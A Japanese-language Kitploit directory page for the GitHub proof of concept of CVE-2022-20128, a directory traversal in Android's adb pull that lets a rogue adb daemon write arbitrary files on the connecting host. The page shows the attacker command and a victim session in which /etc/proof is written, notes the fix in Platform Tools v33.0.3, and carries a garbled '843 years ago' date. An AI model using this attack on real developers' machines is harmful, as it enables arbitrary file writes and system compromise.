Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2022-20128 — Android Debug Bridge (adb) は、adb pull 操作中に不正または侵害された adb デーモンによって仕掛けられる可能性があるディレクトリトラバーサル攻撃に対して脆弱でした。 | Kitploit
ツール/GitHubGitHub/irsl/cve-2022-20128
Androidセキュリティ脆弱性分析エクスプロイトペネトレーションテストモバイルセキュリティ
GitHubirsl/cve-2022-20128

CVE-2022-20128

Android Debug Bridge (adb) は、adb pull 操作中に不正または侵害された adb デーモンによって仕掛けられる可能性があるディレクトリトラバーサル攻撃に対して脆弱でした。

リポジトリを見る
843年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2022-20128

Android Debug Bridge (adb) は、悪意のある、または不正な adb デーモンが adb pull 操作中にディレクトリトラバーサル攻撃を仕掛けられる脆弱性がありました。

悪意のあるデバイス:

root@kitploit:~
./adbdirtrav.py -lp 5111 --content "hello world" --destination-path /etc/proof

被害者:

root@kitploit:~
root@eedd4cb8b202:/tmp/platform-tools# cat /etc/proof
cat: /etc/proof: No such file or directory

root@eedd4cb8b202:/tmp/platform-tools# ./adb connect 10.6.8.145:5111
* daemon not running; starting now at tcp:5037
* daemon started successfully
connected to 10.6.8.145:5111

root@eedd4cb8b202:/tmp/platform-tools# ./adb devices
List of devices attached
10.6.8.145:5111  device

root@eedd4cb8b202:/tmp/platform-tools# ./adb pull /data/local/tmp/1 /tmp/sdfsdf
/data/local/tmp/1/: 1 file pulled, 0 skipped. 0.0 MB/s (11 bytes in 0.150s)

root@eedd4cb8b202:/tmp/platform-tools# cat /etc/proof
hello world

これは Platform Tools v33.0.3 で修正されました。

ツールをダウンロード